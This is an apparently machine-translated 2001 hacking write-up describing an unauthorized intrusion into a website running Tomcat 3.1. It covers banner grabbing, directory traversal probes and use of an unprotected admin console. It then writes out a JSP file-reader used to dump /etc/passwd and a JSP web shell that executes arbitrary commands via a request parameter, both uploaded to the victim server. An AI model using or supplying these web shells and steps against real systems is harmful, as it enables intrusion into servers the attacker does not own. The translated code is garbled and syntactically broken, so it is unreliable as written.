Author: lovehacker This article describes how to obtain root privileges by freebsd 4.0 WEB invasion. The article is mainly based on education. I hope that the viewers do not use some of the methods and procedures in this article to harm the network security. Author: lovehacker Contact: lovehacker@263.net website address: http: //www.chinansl.com copyrighted by UNITA Information Technology Co., Ltd. all, allow reprint, but must maintain the integrity of the article. A very chance, I saw a website, the page is fresh, very comfortable. The website is developed by JSP, because of personal hobbies, I decided to look at the security of the system. Telnet www.target.com 8080 get / chinansl http / 1.1 [enter] [ENTER] Returned the following: http / 1.0 404 Not Found Date: Sun, 08 Jul 2001 07:49:13 GMT Servlet-Engine: Tomcat Web Server / 3.1 (JSP 1.1; servlet 2.2; Java 1.2.2; Linux 2 .2.12 i386; java.vendor = blackdown java-linux team) Content-Language: en content-type: Text / HTML Status: 404

Error: 404

location: / chinansl file notfact
/ chinans I got the name "Tomcat 3.1" of the running Webserver. I remember that I have discovered this version of the vulnerability and POST to Bugtrap. Probably: Through ".." technology can exit the web directory, then: http: // Target: 8080 /../....../../% 00.jsp (no) http: // target: 8080 /FILE/index.jsp (not) http: // target: 8080 / index.jsp (no) http: // target: 8080 / index.jsp% 81 (not) http: // target: 8080 / index.js % 70 (no) http: // target: 8080 / index.jsp% 2581 (no) http: // target: 8080 / web-inf / (no), try it! Tomcat 3.1 comes with a management tool, you can view the directory and files under the web, and you can add context. Try: http: // target: 8080 / admin / administrator does not delete or disable access this directory :-( mistake !!!!! Next, I have some "View All Context" button, list some of the files and directories in the web directory, I started carefully, a small party, found a component of the upload file, Hey, write a JSP file and get a look.

After a few mouthfuls of coffee, I wrote such a Dongdong out: <% @ page import = "java.io. *"%> <% string file = request.getParameter ("file"); string str = "" FileInputStream fis = null; DataInputStream dis = null; try {fis = new FileInputStream (file); dis = new DataInputStream (fis); while (true) {try {str = dis.readLine ();} catch (Exception e) { } IF (Str == NULL) BREAK; OUT.PRINT (STR "
");}}} Catch (IOException E) {}%> Upload this JSP to the other party's web directory by uploading, then: http:// Target: 8080 / upload / test.jsp? file = / etc / passwd 嘿嘿, password coming. I only watched "/ etc / passwd" and didn't look at "/ etc / shadow" because it considers WebServer usually started using Nobody's identity. (Failure) The next process is bored to guess password, no success. Forget it, then I will only have a point, anyway, now I am equivalent to having a shell, I can't guess the password, then I've Ie is my shell environment! Write: <% @ page import = "java.io. *"%> <% try {string cmd = request.getParameter ("cmd"); process child = runtime.getime (). EXEC (CMD); InputStream IN = child.getinputStream (); int C; while ((c = in.read ()))! = -1) {OUT.PRINT ((char) c);} in.close (); try {child.waitfor );} catch (interruptedException e) {E.PrintStackTrace ();}} catch (ooException e) {system.err.println (e);}%> and then put this JSP and upload it through UPLOAD, oh, I am now There is a shell.